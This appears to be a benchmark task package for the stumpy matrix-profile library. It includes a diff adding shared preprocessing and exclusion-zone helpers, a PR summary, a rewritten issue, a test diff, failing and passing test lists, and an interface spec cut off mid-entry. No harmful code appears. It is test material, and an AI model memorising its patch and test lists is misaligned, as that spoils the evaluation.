tmp_T + + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) + if T_A.ndim != 1: # pragma: no cover raise ValueError( f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - if T_B is None: # Self join! - T_B = T_A - ignore_trivial = True - T_B = np.asarray(T_B) - - T_B = np.asarray(T_B) - T_B = T_B.copy() if T_B.ndim != 1: # pragma: no cover raise ValueError( f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_B[np.isinf(T_B)] = np.nan + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) @@ -473,23 +475,11 @@ def gpu_stump(T_A, m, T_B=None, ignore_trivial=True, device_id=0): logger.warning("Arrays T_A, T_B are not equal, which implies an AB-join.") logger.warning("Try setting `ignore_trivial = False`.") - # Swap T_A and T_B for GPU implementation - # This keeps the API identical to and compatible with `stumpy.stump` - tmp_T = T_A - T_A = T_B - T_B = tmp_T - n = T_B.shape[0] k = T_A.shape[0] - m + 1 l = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - T_B[np.isnan(T_B)] = 0 - T_A_fname = core.array_to_temp_file(T_A) T_B_fname = core.array_to_temp_file(T_B) M_T_fname = core.array_to_temp_file(M_T) diff --git a/stumpy/mstump.py b/stumpy/mstump.py index a6b8304..14f1066 100644 --- a/stumpy/mstump.py +++ b/stumpy/mstump.py @@ -29,10 +29,16 @@ def _multi_mass(Q, T, m, M_T, Σ_T, include=None, discords=False): Window size M_T : ndarray - Sliding mean for `T` + Sliding mean for `T_A` Σ_T : ndarray - Sliding standard deviation for `T` + Sliding standard deviation for `T_A` + + μ_Q : ndarray + Mean value of `Q` + + σ_Q : ndarray + Standard deviation of `Q` include : ndarray A list of (zero-based) indices corresponding to the dimensions in `T` that @@ -58,7 +64,10 @@ def _multi_mass(Q, T, m, M_T, Σ_T, include=None, discords=False): D = np.empty((d, k), dtype="float64") for i in range(d): - D[i, :] = core.mass(Q[i], T[i], M_T[i], Σ_T[i]) + if np.isinf(μ_Q[i]): + D[i, :] = np.inf + else: + D[i, :] = core.mass(Q[i], T[i], M_T[i], Σ_T[i]) # Column-wise sort start_row_idx = 0 @@ -115,10 +124,16 @@ def _get_first_mstump_profile( The half width for the exclusion zone relative to the `start`. M_T : ndarray - Sliding mean for `T` + Sliding mean for `T_A` Σ_T : ndarray - Sliding standard deviation for `T` + Sliding standard deviation for `T_A` + + μ_Q : ndarray + Sliding mean for `T_B` + + σ_Q : ndarray + Sliding standard deviation for `T_B` include : ndarray A list of (zero-based) indices corresponding to the dimensions in `T` that @@ -146,9 +161,7 @@ def _get_first_mstump_profile( d, n = T_A.shape D = _multi_mass(T_B[:, start : start + m], T_A, m, M_T, Σ_T, include, discords) - zone_start = max(0, start - excl_zone) - zone_stop = min(n - m + 1, start + excl_zone) - D[:, zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, start, excl_zone) P = np.full(d, np.inf, dtype="float64") I = np.ones(d, dtype="int64") * -1 @@ -298,9 +311,7 @@ def _compute_multi_D( m, QT_odd[i], μ_Q[i, idx], σ_Q[i, idx], M_T[i], Σ_T[i] ) - zone_start = max(0, idx - excl_zone) - zone_stop = min(k, idx + excl_zone) - D[:, zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, idx, excl_zone) @njit(parallel=True, fastmath=True) @@ -547,17 +558,19 @@ def mstump(T, m, include=None, discords=False): See mSTAMP Algorithm """ - T_A = np.asarray(core.transpose_dataframe(T)).copy() - T_B = T_A.copy() + T_A = core.transpose_dataframe(T) + T_B = T_A - T_A[np.isinf(T_A)] = np.nan - T_B[np.isinf(T_B)] = np.nan + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) - core.check_dtype(T_A) if T_A.ndim <= 1: # pragma: no cover err = f"T is {T_A.ndim}-dimensional and must be at least 1-dimensional" raise ValueError(f"{err}") + core.check_dtype(T_A) + core.check_dtype(T_B) + core.check_window_size(m) if include is not None: @@ -567,16 +580,10 @@ def mstump(T, m, include=None, discords=False): logger.warning("Removed repeating indices in `include`") include = include[np.sort(idx)] - d = T_A.shape[0] - n = T_A.shape[1] + d, n = T_B.shape k = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - P = np.empty((d, k), dtype="float64") I = np.empty((d, k), dtype="int64") @@ -587,8 +594,6 @@ def mstump(T, m, include=None, discords=False): start, T_A, T_B, m, excl_zone, M_T, Σ_T, include, discords ) - T_B[np.isnan(T_B)] = 0 - QT, QT_first = _get_multi_QT(start, T_A, m) P[:, start + 1 : stop], I[:, start + 1 : stop] = _mstump( diff --git a/stumpy/mstumped.py b/stumpy/mstumped.py index b5e7fbb..3a623cf 100644 --- a/stumpy/mstumped.py +++ b/stumpy/mstumped.py @@ -72,17 +72,19 @@ def mstumped(dask_client, T, m, include=None, discords=False): See mSTAMP Algorithm """ - T_A = np.asarray(core.transpose_dataframe(T)).copy() - T_B = T_A.copy() + T_A = core.transpose_dataframe(T) + T_B = T_A - T_A[np.isinf(T_A)] = np.nan - T_B[np.isinf(T_B)] = np.nan + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) - core.check_dtype(T_A) if T_A.ndim <= 1: # pragma: no cover err = f"T is {T_A.ndim}-dimensional and must be at least 1-dimensional" raise ValueError(f"{err}") + core.check_dtype(T_A) + core.check_dtype(T_B) + core.check_window_size(m) if include is not None: @@ -92,15 +94,10 @@ def mstumped(dask_client, T, m, include=None, discords=False): logger.warning("Removed repeating indices in `include`") include = include[np.sort(idx)] - d, n = T_A.shape + d, n = T_B.shape k = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - P = np.empty((d, k), dtype="float64") I = np.empty((d, k), dtype="int64") @@ -114,8 +111,6 @@ def mstumped(dask_client, T, m, include=None, discords=False): start, T_A, T_B, m, excl_zone, M_T, Σ_T, include, discords ) - T_B[np.isnan(T_B)] = 0 - # Scatter data to Dask cluster T_A_future = dask_client.scatter(T_A, broadcast=True) M_T_future = dask_client.scatter(M_T, broadcast=True) diff --git a/stumpy/stamp.py b/stumpy/stamp.py index 8fb9a88..b732bcb 100644 --- a/stumpy/stamp.py +++ b/stumpy/stamp.py @@ -51,9 +51,7 @@ def mass(Q, T, M_T, Σ_T, trivial_idx=None, excl_zone=0, left=False, right=False D = core.mass(Q, T, M_T, Σ_T) if trivial_idx is not None: - zone_start = max(0, trivial_idx - excl_zone) - zone_stop = min(T.shape[0] - Q.shape[0] + 1, trivial_idx + excl_zone) - D[zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, trivial_idx, excl_zone) # Get left and right matrix profiles IL = -1 @@ -61,7 +59,7 @@ def mass(Q, T, M_T, Σ_T, trivial_idx=None, excl_zone=0, left=False, right=False if D[:trivial_idx].size: IL = np.argmin(D[:trivial_idx]) PL = D[IL] - if PL == np.inf or zone_start <= IL < zone_stop: + if PL == np.inf: IL = -1 IR = -1 @@ -69,7 +67,7 @@ def mass(Q, T, M_T, Σ_T, trivial_idx=None, excl_zone=0, left=False, right=False if D[trivial_idx + 1 :].size: IR = trivial_idx + 1 + np.argmin(D[trivial_idx + 1 :]) PR = D[IR] - if PR == np.inf or zone_start <= IR < zone_stop: + if PR == np.inf: IR = -1 # Element-wise Min @@ -130,25 +128,22 @@ def stamp(T_A, T_B, m, ignore_trivial=False): T_B.shape[0]-m+1 """ + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B = T_B.copy() + T_B[np.isinf(T_B)] = np.nan + if T_A.ndim != 1: # pragma: no cover raise ValueError(f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. ") - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - - T_B = T_B.copy() - T_B[np.isinf(T_B)] = np.nan if T_B.ndim != 1: # pragma: no cover raise ValueError(f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. ") + + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) subseq_T_B = core.rolling_window(T_B, m) excl_zone = int(np.ceil(m / 2)) - M_T, Σ_T = core.compute_mean_std(T_A, m) - - T_A[np.isnan(T_A)] = 0 # Add exclusionary zone if ignore_trivial: diff --git a/stumpy/stomp.py b/stumpy/stomp.py index 3d2cdc7..da009cc 100644 --- a/stumpy/stomp.py +++ b/stumpy/stomp.py @@ -73,24 +73,20 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): "Please use the Numba JIT-compiled stumpy.stump or stumpy.gpu_stump instead." ) - T_A = np.asarray(T_A) - if T_A.ndim != 1: # pragma: no cover - raise ValueError(f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. ") - n = T_A.shape[0] - - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - if T_B is None: T_B = T_A ignore_trivial = True - T_B = np.asarray(T_B) - T_B = T_B.copy() + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) + + if T_A.ndim != 1: # pragma: no cover + raise ValueError(f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. ") + if T_B.ndim != 1: # pragma: no cover raise ValueError(f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. ") - T_B[np.isinf(T_B)] = np.nan + + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) @@ -107,23 +103,22 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): l = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - out = np.empty((l, 4), dtype=object) # Handle first subsequence, add exclusionary zone - if ignore_trivial: - P, I = stamp.mass(T_B[:m], T_A, M_T, Σ_T, 0, excl_zone) - PR, IR = stamp.mass(T_B[:m], T_A, M_T, Σ_T, 0, excl_zone, right=True) + if np.isinf(μ_Q[0]): + P = np.inf + I = -1 + IR = -1 else: - P, I = stamp.mass(T_B[:m], T_A, M_T, Σ_T) - IR = -1 # No left and right matrix profile available - out[0] = P, I, -1, IR + if ignore_trivial: + P, I = stamp.mass(T_B[:m], T_A, M_T, Σ_T, 0, excl_zone) + PR, IR = stamp.mass(T_B[:m], T_A, M_T, Σ_T, 0, excl_zone, right=True) + else: + P, I = stamp.mass(T_B[:m], T_A, M_T, Σ_T) + IR = -1 # No left and right matrix profile available - T_B[np.isnan(T_B)] = 0 + out[0] = P, I, -1, IR QT = core.sliding_dot_product(T_B[:m], T_A) QT_first = core.sliding_dot_product(T_A[:m], T_B) @@ -139,9 +134,7 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): m, QT, μ_Q[i].item(0), σ_Q[i].item(0), M_T, Σ_T ) if ignore_trivial: - zone_start = max(0, i - excl_zone) - zone_stop = min(k, i + excl_zone) - D[zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, i, excl_zone) I = np.argmin(D) P = np.sqrt(D[I]) @@ -154,7 +147,7 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): if ignore_trivial and i > 0: IL = np.argmin(D[:i]) PL = D[IL] - if PL == np.inf or zone_start <= IL < zone_stop: + if PL == np.inf: IL = -1 IR = -1 @@ -162,7 +155,7 @@ def _stomp(T_A, m, T_B=None, ignore_trivial=True): if ignore_trivial and i + 1 < D.shape[0]: IR = i + 1 + np.argmin(D[i + 1 :]) PR = D[IR] - if PR == np.inf or zone_start <= IR < zone_stop: + if PR == np.inf: IR = -1 out[i] = P, I, IL, IR diff --git a/stumpy/stump.py b/stumpy/stump.py index 90e6582..8761bf1 100644 --- a/stumpy/stump.py +++ b/stumpy/stump.py @@ -12,7 +12,9 @@ from . import core, stamp logger = logging.getLogger(__name__) -def _get_first_stump_profile(start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_trivial): +def _get_first_stump_profile( + start, T_A, T_B, m, excl_zone, M_T, Σ_T, μ_Q, σ_Q, ignore_trivial +): """ Compute the matrix profile, matrix profile index, left matrix profile index, and right matrix profile index for given window within the times @@ -44,6 +46,12 @@ def _get_first_stump_profile(start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_tr Σ_T : ndarray Sliding standard deviation for `T_A` + μ_Q : ndarray + Sliding mean for `T_B` + + σ_Q : ndarray + Sliding standard deviation for `T_B` + ignore_trivial : bool `True` if this is a self join and `False` otherwise (i.e., AB-join). @@ -63,21 +71,31 @@ def _get_first_stump_profile(start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_tr """ # Handle first subsequence, add exclusionary zone - if ignore_trivial: - P, I = stamp.mass(T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone) - PL, IL = stamp.mass( - T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone, left=True - ) - PR, IR = stamp.mass( - T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone, right=True - ) - else: - P, I = stamp.mass(T_B[start : start + m], T_A, M_T, Σ_T) - # No left and right matrix profile available + + if np.isinf(μ_Q[start]): + P = np.inf PL = np.inf PR = np.inf + + I = -1 IL = -1 IR = -1 + else: + if ignore_trivial: + P, I = stamp.mass(T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone) + PL, IL = stamp.mass( + T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone, left=True + ) + PR, IR = stamp.mass( + T_B[start : start + m], T_A, M_T, Σ_T, start, excl_zone, right=True + ) + else: + P, I = stamp.mass(T_B[start : start + m], T_A, M_T, Σ_T) + # No left and right matrix profile available + PL = np.inf + PR = np.inf + IL = -1 + IR = -1 return (P, PL, PR), (I, IL, IR) @@ -270,9 +288,7 @@ def _stump( ) if ignore_trivial: - zone_start = max(0, i - excl_zone) - zone_stop = min(k, i + excl_zone) - D[zone_start : zone_stop + 1] = np.inf + core.apply_exclusion_zone(D, i, excl_zone) I = np.argmin(D) P = np.sqrt(D[I]) @@ -285,7 +301,7 @@ def _stump( if ignore_trivial and i > 0: IL = np.argmin(D[:i]) PL = D[IL] - if PL == np.inf or zone_start <= IL < zone_stop: + if PL == np.inf: IL = -1 IR = -1 @@ -293,7 +309,7 @@ def _stump( if ignore_trivial and i + 1 < D.shape[0]: IR = i + 1 + np.argmin(D[i + 1 :]) PR = D[IR] - if PR == np.inf or zone_start <= IR < zone_stop: + if PR == np.inf: IR = -1 # Only a part of the profile/indices array are passed @@ -364,29 +380,26 @@ def stump(T_A, m, T_B=None, ignore_trivial=True): Note that left and right matrix profiles are only available for self-joins. """ - T_A = np.asarray(T_A) + if T_B is None: + T_B = T_A + ignore_trivial = True + + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) + if T_A.ndim != 1: # pragma: no cover raise ValueError( f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - - if T_B is None: - T_B = T_A - ignore_trivial = True - - T_B = np.asarray(T_B) - T_B = T_B.copy() if T_B.ndim != 1: # pragma: no cover raise ValueError( f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_B[np.isinf(T_B)] = np.nan + + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) @@ -404,11 +417,6 @@ def stump(T_A, m, T_B=None, ignore_trivial=True): l = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - out = np.empty((l, 4), dtype=object) profile = np.empty((l,), dtype="float64") indices = np.empty((l, 3), dtype="int64") @@ -417,14 +425,10 @@ def stump(T_A, m, T_B=None, ignore_trivial=True): stop = l all_start_profiles, indices[start, :] = _get_first_stump_profile( - start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_trivial + start, T_A, T_B, m, excl_zone, M_T, Σ_T, μ_Q, σ_Q, ignore_trivial ) profile[start] = all_start_profiles[0] - T_B[ - np.isnan(T_B) - ] = 0 # Remove all nan values from T_B only after first profile is calculated - QT, QT_first = _get_QT(start, T_A, T_B, m) profile[start + 1 : stop], indices[start + 1 : stop, :] = _stump( diff --git a/stumpy/stumped.py b/stumpy/stumped.py index 4ef209f..c66fac1 100644 --- a/stumpy/stumped.py +++ b/stumpy/stumped.py @@ -83,30 +83,26 @@ def stumped(dask_client, T_A, m, T_B=None, ignore_trivial=True): Note that left and right matrix profiles are only available for self-joins. """ - T_A = np.asarray(T_A) + if T_B is None: + T_B = T_A + ignore_trivial = True + + T_A, M_T, Σ_T = core.preprocess(T_A, m) + T_B, μ_Q, σ_Q = core.preprocess(T_B, m) + if T_A.ndim != 1: # pragma: no cover raise ValueError( f"T_A is {T_A.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - n = T_A.shape[0] - - T_A = T_A.copy() - T_A[np.isinf(T_A)] = np.nan - core.check_dtype(T_A) - - if T_B is None: - T_B = T_A - ignore_trivial = True - T_B = np.asarray(T_B) if T_B.ndim != 1: # pragma: no cover raise ValueError( f"T_B is {T_B.ndim}-dimensional and must be 1-dimensional. " "For multidimensional STUMP use `stumpy.mstump` or `stumpy.mstumped`" ) - T_B = T_B.copy() - T_B[np.isinf(T_B)] = np.nan + + core.check_dtype(T_A) core.check_dtype(T_B) core.check_window_size(m) @@ -124,11 +120,6 @@ def stumped(dask_client, T_A, m, T_B=None, ignore_trivial=True): l = n - m + 1 excl_zone = int(np.ceil(m / 4)) # See Definition 3 and Figure 3 - M_T, Σ_T = core.compute_mean_std(T_A, m) - μ_Q, σ_Q = core.compute_mean_std(T_B, m) - - T_A[np.isnan(T_A)] = 0 - out = np.empty((l, 4), dtype=object) profile = np.empty((l,), dtype="float64") indices = np.empty((l, 3), dtype="int64") @@ -141,12 +132,10 @@ def stumped(dask_client, T_A, m, T_B=None, ignore_trivial=True): QT_first_futures = [] for i, start in enumerate(range(0, l, step)): all_start_profiles, indices[start, :] = _get_first_stump_profile( - start, T_A, T_B, m, excl_zone, M_T, Σ_T, ignore_trivial + start, T_A, T_B, m, excl_zone, M_T, Σ_T, μ_Q, σ_Q, ignore_trivial ) profile[start] = all_start_profiles[0] - T_B[np.isnan(T_B)] = 0 - # Scatter data to Dask cluster T_A_future = dask_client.scatter(T_A, broadcast=True) T_B_future = dask_client.scatter(T_B, broadcast=True)
Added preprocess function Following some discussions in issue #166 I created a preprocessing function (and an `apply_exclusion_zone` function) that is used by all (currently only 1D) algorithms. Furthermore, `core.mass` now supports time series with NaN/Inf.
**Title** Unified preprocessing and exclusion‑zone handling for matrix‑profile algorithms **Problem** Matrix‑profile functions duplicated logic for handling `NaN`/`Inf` values and for applying exclusion zones, leading to inconsistent behavior and incorrect results when such values appear in the time series. **Root Cause** Each algorithm performed its own sanitisation, mean/std computation, and manual slicing for exclusion zones instead of using a common utility. **Fix / Expected Behavior** - Introduce a central preprocessing step that replaces illegal values, computes rolling statistics, and returns a cleaned series. - Add a reusable routine to apply an exclusion zone by marking the appropriate range as `inf`. - Update all core, STOMP, STUMP, GPU‑STUMP, STAMP, MSTUMP, and distributed variants to rely on these utilities. - Ensure queries containing illegal values produce an infinite distance profile rather than crashing or yielding spurious numbers. - Preserve the public API and maintain identical output for valid inputs. **Risk & Validation** - Verify that existing unit tests for self‑joins, AB‑joins, and multi‑dimensional cases still pass. - Add tests covering time series with `NaN`/`Inf` to confirm proper infinite distances and no side‑effects. - Benchmark to ensure the new preprocessing does not degrade performance beyond acceptable limits.
183
TDAmeritrade/stumpy
diff --git a/tests/test_core.py b/tests/test_core.py index 6d98442..0e85185 100644 --- a/tests/test_core.py +++ b/tests/test_core.py @@ -1,5 +1,6 @@ import numpy as np import numpy.testing as npt +import pandas as pd from stumpy import core import pytest import os @@ -32,20 +33,18 @@ def test_check_window_size(): def naive_compute_mean_std(T, m): n = T.shape[0] - cumsum_T = np.empty(len(T) + 1) - np.cumsum(T, out=cumsum_T[1:]) # store output in cumsum_T[1:] - cumsum_T[0] = 0 + M_T = np.zeros(n - m + 1, dtype=float) + Σ_T = np.zeros(n - m + 1, dtype=float) - cumsum_T_squared = np.empty(len(T) + 1) - np.cumsum(np.square(T), out=cumsum_T_squared[1:]) - cumsum_T_squared[0] = 0 + for i in range(n - m + 1): + Q = T[i : i + m].copy() + Q[np.isinf(Q)] = np.nan - subseq_sum_T = cumsum_T[m:] - cumsum_T[: n - m + 1] - subseq_sum_T_squared = cumsum_T_squared[m:] - cumsum_T_squared[: n - m + 1] - M_T = subseq_sum_T / m - Σ_T = np.abs((subseq_sum_T_squared / m) - np.square(M_T)) - Σ_T = np.sqrt(Σ_T) + M_T[i] = np.mean(Q) + Σ_T[i] = np.nanstd(Q) + M_T[np.isnan(M_T)] = np.inf + Σ_T[np.isnan(Σ_T)] = 0 return M_T, Σ_T @@ -171,6 +170,136 @@ def test_mass(Q, T): npt.assert_almost_equal(left, right) +@pytest.mark.parametrize("Q, T", test_data) +def test_mass_nan(Q, T): + T[1] = np.nan + m = Q.shape[0] + + left = np.linalg.norm( + core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1 + ) + left[np.isnan(left)] = np.inf + + right = core.mass(Q, T) + npt.assert_almost_equal(left, right) + + +@pytest.mark.parametrize("Q, T", test_data) +def test_mass_inf(Q, T): + T[1] = np.inf + m = Q.shape[0] + + left = np.linalg.norm( + core.z_norm(core.rolling_window(T, m), 1) - core.z_norm(Q), axis=1 + ) + left[np.isnan(left)] = np.inf + + right = core.mass(Q, T) + npt.assert_almost_equal(left, right) + + +def test_apply_exclusion_zone(): + T = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9], dtype=float) + exclusion_zone = 2 + + index = 1 + left = np.array([np.inf, np.inf, np.inf, np.inf, 4, 5, 6, 7, 8, 9]) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + index = 8 + left = np.array([0, 1, 2, 3, 4, 5, np.inf, np.inf, np.inf, np.inf]) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + index = 4 + left = np.array([0, 1, np.inf, np.inf, np.inf, np.inf, np.inf, 7, 8, 9]) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + +def test_apply_exclusion_zone_multidimensional(): + T = np.array( + [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]], dtype=float + ) + exclusion_zone = 2 + + index = 1 + left = np.array( + [ + [np.inf, np.inf, np.inf, np.inf, 4, 5, 6, 7, 8, 9], + [np.inf, np.inf, np.inf, np.inf, 4, 5, 6, 7, 8, 9], + ] + ) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + index = 8 + left = np.array( + [ + [0, 1, 2, 3, 4, 5, np.inf, np.inf, np.inf, np.inf], + [0, 1, 2, 3, 4, 5, np.inf, np.inf, np.inf, np.inf], + ] + ) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + index = 4 + left = np.array( + [ + [0, 1, np.inf, np.inf, np.inf, np.inf, np.inf, 7, 8, 9], + [0, 1, np.inf, np.inf, np.inf, np.inf, np.inf, 7, 8, 9], + ] + ) + right = T.copy() + core.apply_exclusion_zone(right, index, exclusion_zone) + + utils.replace_inf(left) + utils.replace_inf(right) + npt.assert_array_equal(left, right) + + +def test_preprocess(): + T = np.array([0, np.nan, 2, 3, 4, 5, 6, 7, np.inf, 9]) + m = 3 + + left_T = np.array([0, 0, 2, 3, 4, 5, 6, 7, 0, 9], dtype=float) + left_M, left_Σ = naive_compute_mean_std(T, m) + + right_T, right_M, right_Σ = core.preprocess(T, m) + + npt.assert_almost_equal(left_T, right_T) + npt.assert_almost_equal(left_M, right_M) + npt.assert_almost_equal(left_Σ, right_Σ) + + T = pd.Series(T) + right_T, right_M, right_Σ = core.preprocess(T, m) + + npt.assert_almost_equal(left_T, right_T) + npt.assert_almost_equal(left_M, right_M) + npt.assert_almost_equal(left_Σ, right_Σ) + + def test_array_to_temp_file(): left = np.random.rand() fname = core.array_to_temp_file(left) diff --git a/tests/test_mstump.py b/tests/test_mstump.py index ec0b5fe..0e14bac 100644 --- a/tests/test_mstump.py +++ b/tests/test_mstump.py @@ -40,7 +40,7 @@ def test_multi_mass(T, m): left = utils.naive_multi_mass(Q, T, m) M_T, Σ_T = core.compute_mean_std(T, m) - right = _multi_mass(Q, T, m, M_T, Σ_T) + right = _multi_mass(Q, T, m, M_T, Σ_T, M_T[:, trivial_idx], Σ_T[:, trivial_idx]) npt.assert_almost_equal(left, right) @@ -55,7 +55,9 @@ def test_get_first_mstump_profile(T, m): left_I = left_I[start, :] M_T, Σ_T = core.compute_mean_std(T, m) - right_P, right_I = _get_first_mstump_profile(start, T, T, m, excl_zone, M_T, Σ_T) + right_P, right_I = _get_first_mstump_profile( + start, T, T, m, excl_zone, M_T, Σ_T, M_T, Σ_T + ) npt.assert_almost_equal(left_P, right_P) npt.assert_equal(left_I, right_I)
[ "tests/test_core.py::test_mass_nan[Q0-T0]", "tests/test_core.py::test_mass_nan[Q1-T1]", "tests/test_core.py::test_mass_nan[Q2-T2]", "tests/test_core.py::test_mass_inf[Q0-T0]", "tests/test_core.py::test_mass_inf[Q1-T1]", "tests/test_core.py::test_mass_inf[Q2-T2]", "tests/test_core.py::test_apply_exclusion_zone", "tests/test_core.py::test_apply_exclusion_zone_multidimensional", "tests/test_core.py::test_preprocess" ]
[ "tests/test_core.py::test_check_dtype_float32", "tests/test_core.py::test_check_dtype_float64", "tests/test_core.py::test_check_window_size", "tests/test_core.py::test_sliding_dot_product[Q0-T0]", "tests/test_core.py::test_sliding_dot_product[Q1-T1]", "tests/test_core.py::test_sliding_dot_product[Q2-T2]", "tests/test_core.py::test_compute_mean_std[Q0-T0]", "tests/test_core.py::test_compute_mean_std[Q1-T1]", "tests/test_core.py::test_compute_mean_std[Q2-T2]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q0-T0]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q1-T1]", "tests/test_core.py::test_compute_mean_std_multidimensional[Q2-T2]", "tests/test_core.py::test_calculate_squared_distance_profile[Q0-T0]", "tests/test_core.py::test_calculate_squared_distance_profile[Q1-T1]", "tests/test_core.py::test_calculate_squared_distance_profile[Q2-T2]", "tests/test_core.py::test_calculate_distance_profile[Q0-T0]", "tests/test_core.py::test_calculate_distance_profile[Q1-T1]", "tests/test_core.py::test_calculate_distance_profile[Q2-T2]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q0-T0]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q1-T1]", "tests/test_core.py::test_mueen_calculate_distance_profile[Q2-T2]", "tests/test_core.py::test_mass[Q0-T0]", "tests/test_core.py::test_mass[Q1-T1]", "tests/test_core.py::test_mass[Q2-T2]", "tests/test_core.py::test_array_to_temp_file", "tests/test_core.py::test_get_array_ranges", "tests/test_core.py::test_get_array_ranges_exhausted", "tests/test_mstump.py::test_get_multi_QT[T0-3]", "tests/test_mstump.py::test_get_multi_QT[T1-5]", "tests/test_mstump.py::test_naive_mstump" ]
Function: apply_exclusion_zone(D, idx, excl_zone) Location: stumpy.core Inputs: - D (ndarray): array (1‑D or ND) on which the exclusion zone will be applied; modified in‑place. - idx (int): center index of the exclusion zone. - excl_zone (int): half‑width of the zone; all elements with indices in [idx‑excl_zone, idx+excl_zone] are set to np.inf. Outputs: - None (the input array D is modified in‑place). After execution the specified window contains np.inf. Description: In‑place utility that masks a region around a given index with infinite values, used to enforce exclusion zones in matrix‑profile algorithms. Function: preprocess(T, m) Location: stumpy.core Inputs: - T (array‑like or pandas Series): original time series. - m (int): subsequence/window length. Outputs: - T_out (ndarray): copy of T where any np.inf is first converted to np.nan then all NaNs are replaced by 0. - M_T (ndarray): rolling mean of each length‑m subsequence of the original series (NaNs treated as missing). - Σ_T (ndarray): rolling standard deviation of each length‑m subsequence; NaNs are ignored, and if a subsequence contains only illegal values the std is set to 0. Description: Prepares a time series for distance‑profile calculations by sanitising NaN/Inf values and returning the series together with its rolling statistics. Function: _multi_mass(Q, T, m, M_T, Σ_T, μ_Q, 